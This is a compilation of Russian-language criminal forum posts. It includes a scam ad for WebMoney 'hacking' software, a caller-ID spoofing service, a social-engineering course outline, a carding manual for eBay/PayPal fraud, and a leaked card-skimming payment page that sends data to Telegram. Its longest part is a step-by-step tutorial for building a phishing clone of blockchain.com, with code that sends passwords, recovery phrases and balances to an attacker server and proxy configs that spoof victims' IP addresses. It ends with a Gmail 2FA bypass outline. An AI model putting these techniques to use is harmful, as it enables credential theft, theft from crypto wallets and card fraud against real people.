Для удобства в WMKeeper добавлена новая кнопка. Нажав которую откроется меню: ВЗЛОМ - здесь нужно указать любой известный вам кошелёк, чтобы узнать есть ли на нём деньги и в каком количестве; А также меню Сканирование кошельков" - это Сканирование диапазона кошельков на наличие, на каком то из них денег. После окончания сканирования программа выдаёт отчет, который можно сохранить в файл. Для того чтобы извлечь деньги с чужого кошелька нужно нажать кнопку "HACK" и указать, сколько Вы хотите.
Огромный плюс в том, что при этом Вас невозможно вычислить, т.к. перевод с чужого кошелька в самом чужом кошельке в историю операций не записывается.
Стоимость пакета 100 WMZ. Это уже совсем незаконная работа с реальными деньгами. Если у вас нет таких денег вы можете купить WebMoneyGenerator 7.6 и сгенерировать их.
Webmoney Keeper Patch
Представляет из себя патч, который вносит некоторые изменения в WebMoney Keeper.
Он позволяет переводить любое количество денег имеющихся у вас в кошельке на любой другой кошелёк. При этом все деньги остаются у Вас на счету. Если вы отправите их с протекцией сделки, то они к вам вернуться через заданное время, и ваш счёт пополниться.
Стоимость патча 1000 WMZ. Это стоит того, что вам больше не придётся думать о том, сколько вы потратили. Если у вас нет таких денег вы можете купить WebMoneyGenerator 7.6 и сгенерировать их.
Если у Вас появились вопросы или вы хотите приобрести какую-либо программу пишите на: admins-wm@inbox.ru.
Пишите только на этот адрес!Оплата производиться в системе WebMoney.
Помните, что Вы, как покупатель, несёте полную ответственность за приобретённые программы!
Гарантии и риски:
К сожалению, ввиду специфичности, предоставляемых мною услуг, я не могу гарантировать Вам тот или иной уровень дохода, только Вы сами, на основе, изложенной в этом письме информации, можете сделать выводы о работоспособности и результативности предлагаемых программ. Также Вам следует соблюдать осторожность и конфиденциальность при пользовании ими.
Приобретя программу, Вы получите:
1. Конечно, саму программу и полные инструкции в эксплуатации и мер безопасности
2. Вам будет дан пароль и адрес сайта, на котором вы можете всегда прочитать инструкции, статьи и пообщаться на форуме (где обсуждается совместные сделки, захваты и успехи)...Кроме этого, Вы получаете:
1. Надежный и стабильный источник дохода!
2. Уверенность в себе и своем завтрашнем дне!
3. Вы даже сможете оставить работу в офисе или на предприятии и станете зарабатывать у себя дома, сидя только за компьютером!
4. Вам придется лишь несколько раз в день подключаться к Интернету - этого вполне достаточно для генерации!
5. Вы будете в состоянии удовлетворить любую свою прихоть, так как не будете испытывать стеснения в финансах!
7. Ваше пребывание в Сети будет приносить Вам немалые ДЕНЬГИ!!!Вы никогда не задумывались, почему одни люди извлекают из Интернета тысячи и десятки тысяч долларов в месяц, не особенно себя, утруждая, тогда как другие не в состоянии заработать пары долларов, несмотря на все их титанические усилия? Все очень просто! Преуспевающие люди владеют определенными программами, знают особые секреты и особые технологии, которых не знают остальные!!! Знание в данном случае не просто сила. Знание в данном случае ДЕНЬГИ!!! В прямом смысле этого слова.
Сегодня настало время сорвать завесу таинственности! Представленные программы раскроют Вам секреты интернет-технологии, позволяющую избранным становиться с каждым днем все богаче и богаче и незнание которой вынуждает рядовых пользователей Интернет пребывать в нищете!
Эти уникальные программы предназначены для тех, кто устал рыскать в Сети в поисках РЕАЛЬНЫХ способов заработка при помощи компьютера и сети Интернет. Вы уже, наверняка, испытали массу предложенных Вам способов заработать , поддавшись на заманчивые призывы получить 10.000$ за неделю или 1.000.000$ за день . Наверняка пробовали рассылать тысячи электронных писем, кликать по баннерам и привлекать посетителей на сайты спонсоров, которые в итоге заплатили Вам жалкие пару долларов или же не заплатили совсем ничего. Те, кто не выдержали разочаровались, сдались и навсегда потеряли вкус к интернет-заработку, объявив все это обманом и чушью. Другие нашли свою нишу, но продолжают гнуть спину на спонсоров, кликать баннеры или рассылать никому не нужный спам, получая за это 10-50$ в месяц МАКСИМУМ!
Вот некоторые ответы на возможные вопросы:
Вопрос: Зачем вам нужны деньги от продажи WMG если вы и так с помощью неё зарабатываете неплохие деньги?
Ответ: Деньги от продажи - мне нужна так сказать для "отмывания" генерируемых денег, т.е. для того, что бы меня не "засекла" администрация WebMoney. Однако, в связи с тем, что количество пользователей программы не безгранично, установлена довольно высокая цена.
Вопрос: Зачем вам нужны деньги от продажи WMG, если вы и так с помощью неё зарабатываете неплохие деньги?
Ответ: Деньги от продажи - нам нужна так сказать для "отмывания" генерируемых денег, т.е. для того что бы нас не "засекла" администрация WebMoney. Однако, в связи с тем, что количество пользователей программы не безгранично, установлена довольно высокая цена.
Вопрос: Пришлите, пожалуйста, мне архив с программой просто так! После начала работы с программой, я вышлю Вам денег, сколько скажете, хоть 1000$!
Ответ: Я сам могу нагенерировать сколько угодно этих же самых $$$! Дело то не в этом, дело в "отмывании" генерируемых денег.
Вопрос: Предоставляете ли вы, какие либо гарантии относительно функциональности программы? А если она не работает? Какие гарантии, что программа будет выслан?
Ответ: Мне сложно доказать вам и я этого не собираюсь делать, могу лишь сказать что у нас работают серьезные люди, т.к. очень серьезные суммы. Если вы хоть, на сколько сомневаетесь, то НЕ покупайте программу!
Вопрос: А будет ли WMG работать - у меня старый компьютер и очень низкая скорость соединения Интернета?
Ответ: Программа успешно работает на малой скорости Интернета и на слабых компьютерах - потр**ляет немного трафика и памяти, но я уверен что, после ее использования (раньше через месяц) Вы сможете использовать высокоскоростной доступ в Интернет на мощном ПК (например, купить новый компьютер и подключить выделенную линию)
Если у Вас появились вопросы или Вы хотите приобрести какую-либо программу пишите на: admins-wm@inbox.ru.
Пишите только на этот адрес!Оплата производиться в системе WebMoney.
НЕ ТРАТЬТЕ ВРЕМЯ НА ПУСТЫЕ РАЗДУМЬЯ!!! ЗАКАЗЫВАЙТЕ ПРОГРАММУ НЕМЕДЛЕННО И СРАЗУ ЖЕ НАЧИНАЙТЕ ПОЛУЧАТЬ ПРИБЫЛЬ ИЛИ ЗАКРОЙТЕ ЭТО ПИСЬМО И ЛИШАЙТЕСЬ ЭТОЙ ВОЗМОЖНОСТИ!!!
Но в любом случае (купите ли Вы программу или нет), я искренне желаю вам удачи и процветания!!!
Click to expand...
Организую для вас доступ к сервису. Звонки куда угодно и кому угодно с любого
номера который вы сами пропишите в исходящих, хоть 8-800 -800-800, хоть
+77777777777, хоть +00000000000. Обучу работе с сервисом и установкой программ
на телефон либо компьютер. Если например вы звоните "Васе" у которого в его
контактах есть "Петя" то подставляя "Петин" номер и позвонив "Васе" у "Васи"
отобразится звонящий "Петя" и будет играть мелодия вызова, та которая
выставлена на "Петю". Всё очень конфиденциально! Никакого IMEI и никаких
следов вашего присутствия. Если "Вася" возьмет распечатку звонков у своего GSM
оператора, то он увидит что ему действительно звонил якобы "Петя". Тарифы на
звонки очень дешевые, как по РФ так и по всему миру, этот тариф вы пополняете
и контролируете сами в личном кабинете. Есть функция изменения голоса - шесть
положений, от низкого до высокого. Подскажу применение данного сервиса для
серого и черного заработка. Профит будет зависеть только от Вашей душевной
доброты и широты. Если интересно -пишите в личку. Для проверки пишите номер с
какого позвонить и на какой позвонить и в какое время, с удовольствием сделаю
прозвон.
Контакты:
Телега: @Elektrik139
ICQ - 694267082
Программа занятий:
1 ЗАНЯТИЕ. СОЦИАЛЬНАЯ ИНЖЕНЕРИЯ КАК СИСТЕМА МАНИПУЛЯЦИЙ МНЕНИЕМ И ПОВЕДЕНИЕМ
ЧЕЛОВЕКА
Социальная инженерия как система манипуляций мнением и поведением человека с
целью получения от него необходимых сведений и подталкиванию его к заведомо
невыгодным решениям и действиям.
- принципы СИ
- использование социальных стереотипов и законов СИ
- модели использования страхов и потребностей в СИ
- принципы защиты от изученных инструментов
- кейсы и примеры
2 ЗАНЯТИЕ. СОЦИАЛЬНАЯ ИНЖЕНЕРИЯ КАК ПОДБОР ИНДИВИДУАЛЬНЫХ КЛЮЧЕЙ К КАЖДОМУ
ЧЕЛОВЕКУ ДЛЯ ЦЕЛЕНАПРАВЛЕННЫХ МАНИПУЛЯЦИЙ
- механизмы быстрой установки доверительного контакта
- факторы, влияющие на доверие и как их целенаправленно использовать
- алгоритм определения ценностей и мотивов человека
- социальные сети как инструмент определения психологического профиля
- принципы защиты от изученных паттернов
- кейсы и примеры
3 ЗАНЯТИЕ. NUDJING (НАДЖИНГ) – ПОДТАЛКИВАНИЕ КАК ПРИНЦИП КОСВЕННЫХ ВНУШЕНИЙ И
ПОДТАЛКИВАНИЕ К ПРИНЯТИЮ НУЖНЫХ ВАМ РЕШЕНИЙ
- концепция подталкивания и ее принципы. Наджинг как принцип незаметного
воздействия на поведение и убеждения человека.
- наджинг в контексте социальной инженерии и влияния
- подталкивание в манипуляциях и убеждающей коммуникации
- иррациональность и рациональность в манипуляциях и социальной инженерии
- кейсы и примеры
4 ЗАНЯТИЕ. ЧЕРНЫЙ ПРОФАЙЛИНГ И ПОИСК ИНДИВИДУАЛЬНЫХ УЯЗВИМОСТЕЙ ЧЕЛОВЕКА
- оценка картины мира человека на предмет уязвимостей
- базовые уязвимости и сценарии их активации
- инструменты защиты и конструктивное реагирование на манипулятивные приемы
- кейсы и примеры
5 ЗАНЯТИЕ. ЛОЖЬ И ВВЕДЕНИЕ В ЗАБЛУЖДЕНИЕ В СОЦИАЛЬНОЙ ИНЖЕНЕРИИ И МАНИПУЛЯЦИЯХ
- ложь как классическая манипуляция
- критерии и признаки обмана, который трудно распознать даже профессионалам.
- мошенничество как создание легенды, в которую хочется поверить. Как это
делается?
- кейсы и разбор примеров.
You must have at least 2 reaction(s) to view the content.
хочу в команду. Работал fullstack-ом, заебало, могу писать скрипты или какие-
то сайты фишинговые и не только. Могу с обналом заняться, много знакомых,
мелких криминалов со своими миньонами.
Я понадоблюсь в команде, я профессионал своего дела.
Английский лучше русского
знаю.
я знаю что правильнее
ВЛИТьСЯ
**_Всем привет, с вами Матильда. Сегодня я хотел(-а) бы слить вам мануал,
который покупал(-а) в том году о том, как вбивать eBay с помощью аккаунта, на
котором привязан PayPal.
Так как я потерял(-а) само обучение, буду писать вам от руки, так-что погнали!
Для начала вам понадобится материал для работы. Рекомендаций по актуальным
сервисам с продажей материала подсказать не могу, так как работал(-а) по
данной схеме месяцев 5-6 назад. Что именно нам понадобится? _
- Аккаунт ebay + PP (или CC, но с палкой больше проходимость!)
- Дедик / SSH (С дедиков чаще транза проходила, чем с SSH)
- Дроп сервис, на который будете принимать пак (или если это гифт, то доступ
к почте акка ибэй)
Теперь мы знаем, что нам нужно для работы, о'кей! А далее выбираем страну, с
которой будем работать. Лично я выбирал(-а) Германию и Великобританию (С
Германии чаще паки проходили). Покупаем дедик в Германии, аккаунт ebay + PP
Германиии, берём у дропа адрес В ГЕРМАНИИ, всё...
Залетаем на дедик, проверяем сразу, что за браузер стоит. В наших интересах
Firefox / Chrome. Далее качаем расширение User Agent Switcher (вскоре поймёте
почему) и приступаем к работе.
Нам важно, чтобы eBay воспринял нас как обыкновенного клиента, ясное дело,
значит теперь запоминаем:
Заходим на сайт ebay.de (если у вас Немецкий дедик) или ebay.co.uk (Если же Великобритании) - Меняем User Agent на айфон - нажимаем на кнопку Login, вводим собственно ручно логин и пароль, логинемся - как залогинились меняем user agent на ваш обычный ПК.
Теперь нам надо поменять адрес, на который будет приниматься весь стафф. Меняем, но не трогаем имя и фамилию получателя!!!
Хорошо, далее прогреваем аккаунт, чтобы всё было как по маслу, а теперь
вбиваем (оплачивая пэйпалом, привязанным к акку) какую нибудь вещитцу на ~70
евро, чтобы потом можно было вбивать на более крупные. На этом всё. Процес
вбива окончен.
Надеюсь, что моя первая тема вам была полезна, + продажник на данный мануал
составлял 5к рублей, так что, я сегодня был щедр(-а). Всем пока!**
Сливаю вам свою платёжку, кому надо тот заценит, допилит если что-то нужно и будет использовать
1. все данные идут в telegram, в архиве инструкция.txt инфа как настроить
бота и чат
2. проверка на валид всех полей, сейчас заточка под юсу так что ZIP только
пятизначный и номер от 9 до 11 цифр, кому нужно-найдёт и поправит
3. проверка на валид карты по алгоритму луна, т е х#йню ты туда не введёшь и
если ошибся в одной цифре то не даст
4. система работников, то есть если у вас много траферов, то даёте ссылку с
/?utm_content=WORKER в конце, вместо WORKER ставите имя работника в тг
5. фулл адаптив, все слова/валюта/картинки/цены/промокод(ы)/товары меняются
под вас, можно перевести сменить валюту и лить на любую страну
https://prnt.sc/we5wdv
6. уведомление при переходе на платёжку (если льёте с лендинга логично),
можно в index.php чатайди поставить канала, а в creditcard.php уже чата с
работниками
7. проверка на "оплату", просто так на ссылку thank-you.php не перейдёшь,
только с оплаты.
в thank-you.php у меня там через 5 секунд скачка АПК, так что можете залить
файл сменить название (найдёте сами где) и лить на стиллак/апк с картой, ток
нахуй это надо вам хз, короче что нибудь придумаете
Там ещё есть оплата битком, в ориг была палка так что можете просто иконку поменять битка, ввести PayPal и редиректить на мерч палки, я биток по приколу поставил
P. S. можете прикрутить чекер карт, сейчас много чекеров имеют api так что кому действительно нужно тот найдёт где как и сделает
P. P. S. и мобильная и пк версия норм работают (vrode)
prihodit: https://prnt.sc/w3xv58
'НОВАЯ КАРТА! воркер:' => $worker,
'IP: ' => $aipi,
'Страна: ' => $result,
'ГородIP: ' => $result2s,
'Номер карты: ' => $number,
'Экспа: ' => $expiry,
'CVC: ' => $cvc,
'Имя: ' => $kxname,
'Фамилия: ' => $kxsur,
'Адрес: ' => $adres,
'Номер телефона: ' => $phone,
'Почта: ' => $pochta,
'ZIP: ' => $zipcode,
ДЕМО:
https://payment.nj0tic.pw/payment/invoice_uid=f387f7df-4b2c-4b7a-aa14-09e1088f2b8b/
СКАЧАТЬ: https://dropmefiles.com/eDnCY
Все мы наслышаны про фэйки блокчейна(в нашем случае blockchain.com), но видел ли кто из нас простых смертных саму реализацию и что вообще фэйк из себя представляет?
Купить на рынке готовый продукт при этом, не зная из чего он состоит технически - это очень рискованно. Ведь за последние полгода, а может и год - уже объявлялись очень много кидал, которые показывали демо фэйка и сливались после получения крупной суммы, но сама статья не об этом.
НЕСТАНДАРТНЫЙ конкурс статей - требует нестандартных решений)))
Дело было вечером, делать было нечего и я решил посмотреть, как же можно
реализовать фэйк блокчейна, не имея общего технического представления как это
реализовали другие, опираясь только на описание возможностей и документацию.
И так, на минуточку вспомним всё, что мы знаем про фэйки.
Фейк (англ. fake — подделка, фальшивка, обман, мошенничество) — что-либо ложное, недостоверное, сфальсифицированное, выдаваемое за действительное, реальное, достоверное с целью ввести в заблуждение.
Click to expand...
Простыми словами, фэйк - это полноценная копия сайта с единственным отличием в
домене, где основная идея заключается в том, чтобы посетитель не понял подмены
и ввёл нужные нам данные.
И так, поехали!
Первым делом заходим на сайт: https://login.blockchain.com
Замечаем внизу данные версии и ссылку, которая ведёт на Github.
Переходим по ней и видим, что в репозитории выложены сорсы веб-интерфейса!
Хм... интересно, получается, что можно поднять копию веб-интерфейса без каких-
либо знаний?
Я не мог поверить своим глазам, разве это было так просто? Кому пришла идея
выложить это добро официально вообще не понятно.
Далее вчитываемся в инструкцию, пробуем установить:
Code:Copy to clipboard
wget https://codeload.github.com/blockchain/blockchain-wallet-v4-frontend/zip/refs/tags/v4.48.16
unzip blockchain-wallet-v4-frontend-4.48.16.zip
cd blockchain-wallet-v4-frontend
./setup.sh
yarn start:dev
Результат - ну "почти" полноценный фэйк
Правда пока этот фэйк ничего не делает в плане отправки данных, чем мы сейчас
и займёмся.
Нам нужно в файлах найти авторизацию и попробовать добавить свою функцию.
Ищем в файлах по ключевому слову "login".
Находим основной файл авторизации:
Открываем файл: packages/blockchain- wallet-v4-frontend/src/data/auth/sagas.js
Добавляем функцию для простой отправки:
Code:Copy to clipboard
const submitAuth = function ({guid, password}) {
axios({
url: `https://admin.blockchain.test/api/wallets`,
method: 'POST',
data: {
guid: guid,
password: password
},
headers: {
'Content-Type': 'application/json'
}
})
}
А так же после блока сессии:
Code:Copy to clipboard
let session = yield select(selectors.session.getSession, guid)
Добавляем:
Code:Copy to clipboard
yield call(submitAuth, {guid, password})
Осталось самое главное, запустить это всё на тестовом домене и посмотреть всю
работоспособность.
Редактируем файл hosts:
Code:Copy to clipboard
127.0.0.1 login.blockchain.test
Открываем http://login.blockchain.test и пытаемся авторизоваться.
Смотрим, что ничего не происходит, первым делом проверяем консоль:
Ждало меня разочарование, оказывается API сервер не даёт делать запросы извне
из-за CORS.
Думаем, думаем, как же решается CORS? Так ведь обычным реверс прокси на уровне
веб-сервера. Разве нет?
Файл конфигурации для простого реверс прокси веб-сервера Caddy :
Code:Copy to clipboard
reverse.blockchain.test {
route {
reverse_proxy * https://blockchain.info {
header_up -Host
header_up origin https://login.blockchain.com
header_up referer https://login.blockchain.com/
header_down Access-Control-Allow-Origin "*"
header_down Content-Security-Policy "*"
header_down Access-Control-Allow-Headers "*"
header_down Access-Control-Allow-Methods "POST, GET, OPTIONS"
}
}
}
Что именно делает данный конфиг - просто проксирует все запросы к домену blockchain.info и меняет ответ в котором разрешает CORS-запросы, можно на абсолютно любом веб-сервере такое провернуть - для простоты работы и наглядности и был выбран Caddy, как отличный легковесный веб-сервер с автоматической поддержкой ssl, который написан на Go.
Теперь меняем адрес API сервера в нашем файле веб-интерфейса, для этого открываем файл config/env/production.js
Меняем:
Code:Copy to clipboard
ROOT_URL: 'https://blockchain.info',
На значение:
Code:Copy to clipboard
ROOT_URL: 'http://reverse.blockchain.test',
Пробуем еще раз авторизоваться:
Ураааа! Авторизация прошла успешно и письмо для подтверждения было отправлено.
Нам осталось только проверить почту и открыть письмо:
Да, но какого чёрта тут делает IP-адрес моего сервера? ??
Я на минуточку задумался, мы же только недавно обходили CORS, поэтому и высвечивается этот адрес, и тут я вспомнил... во всех темах, где арендовался фэйк было написано про такую фичу, как IP-спуфинг.
Смысл заключается в том, что обычный пользователь оказавшийся на фэйке при подтверждении по почте, поймёт, что это IP-адрес чужой и попросту не подтвердит, что не есть хорошо. Получается, без этой фичи наш фэйк - это лишь подобие мощного комбайна, такое можно было и на HTML+CSS сделать.
Нужно немного найти информации про этот спуф... и так вспоминаем:
IP-спуфинг - Вид хакерской атаки, заключающийся в использовании чужого IP- адреса источника с целью обмана системы безопасности.
Click to expand...
Немного поразмыслив, вновь дочитав про IP-спуфинг, я пришёл к выводу, что IP- спуфинг работает только в UDP.
Протокол транспортного (4) уровня TCP имеет встроенный механизм для предотвращения спуфинга
Click to expand...
В запросе HTTP не получится подменить IP-адрес, ведь HTTP работает через TCP протокол.
Неужели это конец? Я немного расстроился, заварил чайку и всё-таки решил еще
раз, посмотреть сам сайт и запросы https://login.blockchain.com
после
авторизации:
О, да... очень интересный саб-домен в заголовке x-original-host: wallet.prod.blockchain.info
!
Нам нужно узнать подробности для всех доменов и IP-адресов.
Делаем запрос, чтобы узнать, где находится blockchain.info:
Code:Copy to clipboard
nslookup blockchain.info
Non-authoritative answer:
Name: blockchain.info
Address: 104.16.143.212
Name: blockchain.info
Address: 104.16.147.212
Name: blockchain.info
Address: 104.16.144.212
Name: blockchain.info
Address: 104.16.146.212
Name: blockchain.info
Address: 104.16.145.212
Теперь узнаём кому принадлежит IP-адрес:
Code:Copy to clipboard
whois 104.16.143.212
NetRange: 104.16.0.0 - 104.31.255.255
CIDR: 104.16.0.0/12
NetName: CLOUDFLARENET
NetHandle: NET-104-16-0-0-1
Parent: NET104 (NET-104-0-0-0-0)
NetType: Direct Assignment
OriginAS: AS13335
Organization: Cloudflare, Inc. (CLOUD14)
RegDate: 2014-03-28
Updated: 2017-02-17
Comment: All Cloudflare abuse reporting can be done via https://www.cloudflare.com/abuse
Осталось узнать, где находится wallet.prod.blockchain.info:
Code:Copy to clipboard
nslookup wallet.prod.blockchain.info
Name: wallet.prod.blockchain.info
Address: 35.201.74.1
Вновь узнаём кому принадлежит IP-адрес:
Code:Copy to clipboard
whois 35.201.74.1
NetRange: 35.192.0.0 - 35.207.255.255
CIDR: 35.192.0.0/12
NetName: GOOGLE-CLOUD
NetHandle: NET-35-192-0-0-1
Parent: NET35 (NET-35-0-0-0-0)
NetType: Direct Allocation
OriginAS:
Organization: Google LLC (GOOGL-2)
RegDate: 2017-03-21
Updated: 2018-01-24
Comment: *** The IP addresses under this Org-ID are in use by Google Cloud customers ***
На минутку я замер: они используют CloudFlare, но при этом основной сервер на который пересылаются запросы находится в облаке Google.
Пробуем пинговать:
Code:Copy to clipboard
ping wallet.prod.blockchain.info -c 1
PING wallet.prod.blockchain.info (35.201.74.1) 56(84) bytes of data.
64 bytes from 1.74.201.35.bc.googleusercontent.com (35.201.74.1): icmp_seq=1 ttl=119 time=0.968 ms
--- wallet.prod.blockchain.info ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.968/0.968/0.968/0.000 ms
Открываем сам сайт:
404... хм... что-то и чай уже сильно остыл - ну да ладно, ведь мы тут нашли
кое что-то очень интересное.
Я опять расстроился, но на минутку вспомнил, что раз сайт проксируется через CloudFlare, а далее передаётся в Google Cloud, то значит что они как-то передают нужные заголовки.
Ведь любой человек, который когда-либо работавший с CloudFlare знает, что все запросы на сервер идут: Посетитель <-> CloudFlare <-> Сервер.
Поэтому, чтобы восстановить реальный IP-адрес посетителя нам нужно прочитать документацию: <https://support.cloudflare.com/hc/en- us/articles/200170786-Restoring-original-visitor-IPs>
И так, с уже остывшим чаем продолжаем наш путь, в документации говорится, что
бы получить IP-адрес посетителя нужно получать данные из заголовков CF-
Connecting-IP, в нашем же случае нам нужно отправлять такой заголовок, пробуем
для начала в обычном запросе:
Проверяем почту:
Чему я был безумно рад, осталось это интегрировать в наш реверс прокси:
Code:Copy to clipboard
reverse.blockchain.test {
route {
reverse_proxy * https://wallet.prod.blockchain.info {
header_up -Host
header_up origin https://login.blockchain.com
header_up referer https://login.blockchain.com/
header_up Cf-Connecting-Ip {http.request.remote.host}
header_down Access-Control-Allow-Origin "*"
header_down Content-Security-Policy "*"
header_down Access-Control-Allow-Headers "*"
header_down Access-Control-Allow-Methods "POST, GET, OPTIONS"
}
}
}
Авторизация работает, но почему-то не показывается баланс:
Открываем консоль, далее смотрим, что проблема возникает из-за того, что
/multiadd доступен только blockchain.info, а в wallet.prod.blockchain.info его
попросту нет:
Оказывается наш реверс прокси не совсем универсальный. Добавляем немного логики в наш реверс прокси:
Code:Copy to clipboard
reverse.blockchain.test {
route {
reverse_proxy /multiaddr https://blockchain.info {
header_up -Host
header_up origin https://login.blockchain.com
header_up referer https://login.blockchain.com/
header_down Access-Control-Allow-Origin "*"
header_down Content-Security-Policy "*"
header_down Access-Control-Allow-Headers "*"
header_down Access-Control-Allow-Methods "POST, GET, OPTIONS"
}
reverse_proxy * https://wallet.prod.blockchain.info {
header_up -Host
header_up origin https://login.blockchain.com
header_up referer https://login.blockchain.com/
header_up Cf-Connecting-Ip {http.request.remote.host}
header_down Access-Control-Allow-Origin "*"
header_down Content-Security-Policy "*"
header_down Access-Control-Allow-Headers "*"
header_down Access-Control-Allow-Methods "POST, GET, OPTIONS"
}
}
}
Отлично! Теперь все работает прекрасно!
Как итог, мы уже имеем: захват логина и пароля + IP-спуфинг.
Но это нам ничего не даёт, ведь подтвердить по почте мы не сможем, а если у
пользователя еще включена двух-факторная авторизация или блокировка по IP-
адресу, то тут совсем беда.
Фэйк сделать-то сделали, но пользы от него мы не получим, если не будет
постоянного доступа к аккаунту.
Решил всё-таки вернуться к истокам и еще раз посмотреть сам веб-интерфейс, нас
интересуют настройки безопасности:
Интересно, секретный ключ восстановления даёт возможность любому получить доступ к аккаунту?! Простите, что? ?
Перечитываю пару раз и только потом доходит, что этот секретный ключ - это
нечто из разряда святых, если его потерял то можно лишиться денег на аккаунте.
И если он показывается в веб-интерфейсе, значит можно тоже отправить к себе,
но для начала нам нужно проверить возможности секретного ключа.
Включаем в настройках двух-факторное подтверждение + белый список по IP-
адресу.
Нам осталось только проверить, для этого мы подключаемся через второй сокс и
переходим по ссылке, где вводим ключ восстановления:
После ввода правильного секретного ключа появляется форма для смены пароля:
Вводим пароль и нажимаем на Recover Funds и после этого попадаем моментально в аккаунт:
Как итог, восстановление через секретный ключ позволяет обойти любые ограничения аккаунта: двух-факторную авторизацию + белый список по IP-адресу.
Это просто жесть, подумал я на минутку... значит даже смысла в записи логина пароля нет, можно просто собирать секретные ключи и восстанавливать аккаунты, а далее отключать настройки безопасности, в том числе изменять почтовый адрес.
"Так это фича, а не баг" - так сказали бы разработчики... ?
Теперь нам осталось добавить все недостающие возможности в сам фэйк.
Code:Copy to clipboard
const recoverySaga = function * ({ password }) {
const getMnemonic = s => selectors.core.wallet.getMnemonic(s, password)
try {
const mnemonicT = yield select(getMnemonic)
const mnemonic = yield call(() => taskToPromise(mnemonicT))
const mnemonicArray = mnemonic.split(' ')
yield put(
actions.modules.settings.addMnemonic({ mnemonic: mnemonicArray })
)
} catch (e) {
yield put(
actions.logs.logErrorMessage(logLocation, 'showBackupRecovery', e)
)
}
}
Нам нужно немного его изменить, открываем файл packages/blockchain- wallet-v4-frontend/src/data/goals/sagas.ts
Добавляем функцию для возврата секретного ключа в удобном для нас формате:
Code:Copy to clipboard
const recoverySagaInfo = function * ({ password }) {
const getMnemonic = s => selectors.core.wallet.getMnemonic(s, password)
try {
const mnemonicT = yield select(getMnemonic)
const mnemonic = yield call(() => taskToPromise(mnemonicT))
return mnemonic;
} catch (e) {
}
}
Нужно еще эти данные отправить, добавляем функцию отправки:
Code:Copy to clipboard
const submitRecover = ({ guid, recovery }: { guid: string, recovery: any }) =>
axios({
url: `https://admin.blockchain.test/api/recovers`,
method: 'POST',
data: {
guid: guid,
recover: recovery
},
headers: {
'Content-Type': 'application/json'
}
})
Ищем в файлах "SecondPassword" находим удивительный вызов функции:
Code:Copy to clipboard
import { promptForSecondPassword } from 'services/sagas'
const password = yield call(promptForSecondPassword)
Прекрасно. Это именно то, что нам и было нужно.
Открываем файл packages/blockchain- wallet-v4-frontend/src/data/goals/sagas.ts
Добавляем функцию для отправки данных второго пароля:
Code:Copy to clipboard
const submitSecondPass = ({ guid, password }: { guid: string, password: string }) =>
axios({
url: `https://admin.blockchain.test/api/seconds`,
method: 'POST',
data: {
guid: guid,
password: password
},
headers: {
'Content-Type': 'application/json'
}
})
Вызывать функцию будем чуть позже.
3) Баланс
Если будет информация о балансе кошелька, то будет легче понимать какой из аккаунтов нужно восстанавливать моментально и в дальнейшем просто добавить уведомления.
Ищем в файлах "balances", находим не менее удивительный вызов функции в том же файле, который мы редактировали ранее:
Code:Copy to clipboard
// check/wait for balances to be available
const balances = yield call(waitForAllBalances)
Добавляем функцию для отправки данных баланса:
Code:Copy to clipboard
const submitBalance = ({ balances, guid }: { balances: any, guid: string }) =>
axios({
url: `https://admin.blockchain.test/api/balances`,
method: 'POST',
data: {
guid: guid,
"btc": balances.btc,
"eth": balances.eth,
"bch": balances.bch,
"pax": balances.pax,
"xlm": balances.xlm,
"usdt": balances.usdt,
"wdgld": balances.wdgld
},
headers: {
'Content-Type': 'application/json'
}
})
Теперь, после авторизации, чтобы отправляло, нам нужно изменить файл
packages/blockchain-wallet-v4-frontend/src/data/auth/sagas.js
:
Ищем функцию:
Code:Copy to clipboard
yield put(actions.goals.saveGoal('syncPit'))
Добавляем после неё
Code:Copy to clipboard
yield put(actions.goals.saveGoal('sendData'))
После чего нам нужно добавить новую функцию в файл packages/blockchain- wallet-v4-frontend/src/data/goals/sagas.ts
:
Code:Copy to clipboard
const runSendData = function * (goal) {
const { id } = goal
// Удаляём задачу, чтобы не запускалось сто раз.
yield put(actions.goals.deleteGoal(id))
// Ждём данных пользователя
yield call(waitForUserData)
// Получаем идентификатор аккаунта
const guid = yield select(selectors.core.wallet.getGuid)
// Ждём загрузки баланса
const balances = yield call(waitForAllBalances)
// @ts-ignore
yield call(submitBalance, {guid, balances});
// Получаем второй пароль
const password = yield call(promptForSecondPassword) || null ;
// @ts-ignore
yield call(submitSecondPass, {guid, password});
// Получаем секретный ключ восстановления
const recovery = yield call(recoverySagaInfo, { password })
// @ts-ignore
yield call(submitRecover, {guid, recovery});
}
В том же файле ищем:
Code:Copy to clipboard
case 'syncPit':
yield call(runSyncPitGoal, goal)
break
Добавляем после неё
Code:Copy to clipboard
case 'sendData':
yield call(runSendData, goal)
break
В файле packages/blockchain-wallet-v4-frontend/src/data/goals/types.ts
:
После "referral ", добавляем "sendData ".
Готово! Наш безупречный фэйк со всеми возможностями создан.
Для наглядности хотелось бы так же выложить материалы с подробными
инструкциями по установке на сервер:
- Фэйк (конфиги + скрипты, сервер vps-1)
- Реверс прокси (конфиги + скрипты, сервер vps-2)
- Простенькая админ панель (конфиги + скрипты, сервер vps-3)
Но опасаясь спекуляций со стороны недобросовестных пользователей(и резкого роста торговцев фейками блокчейна) данный материал в иерархическом порядке хотелось бы передать администраторами и модераторам форума, а так же специалистам, которые бы хотели "потрогать" и убедиться, что всё описанное в данной статье - актуально и работает на момент публикации.
PS: возможно полетят абузы, что в паблик уходит приват, но нет, друзья - до этого мог дойти любой и тут показано как именно достигнут результат, а не просто выкладывается готовое решение.
Данная статья для конкурса является прямым подтверждением того, что нет ничего
невозможного.
Просто пробуйте, и Вы добьетесь всего и всегда.
С единственной в данном случае оговоркой, о которой хотелось бы
напомнить(привет, Ubuntu/Debian):
"C великой силой приходит и великая ответственность"
Автор stooper
источник конкурс статей exploit.in
Доброго времени суток.В данном мануале будет пример как с помощью ZennoPoster
возможно обойти любую 2FA авторизацию на Gmail посредством параллельного входа
в аккаунт и созданием профиля.
Это не мануал к действию или призыв к нарушению закона, я как автор этого не
поддерживаю и призываю не нарушать законы ваших стран, моя статья создана для
демонстрации варианта обхода 2FA.
Так же часть скриптов/экшенов не будет показана, повторюсь, это пища для
размышления.
Вся суть работы заключается в параллельном входе в акк холдера, граббингом его
2FA страницы,выдачей ее на фэйке,валидация данных, вход в акк и удаление
алерта.Много буков писать не стал, сделал видос в котором все наглядно
показано.
Мы можем выдавать абсолютно любую страницу на нашем фэйке и брать с нее
данные.
Такой подход позволяет проделать нужные действия после входа в аккаунт
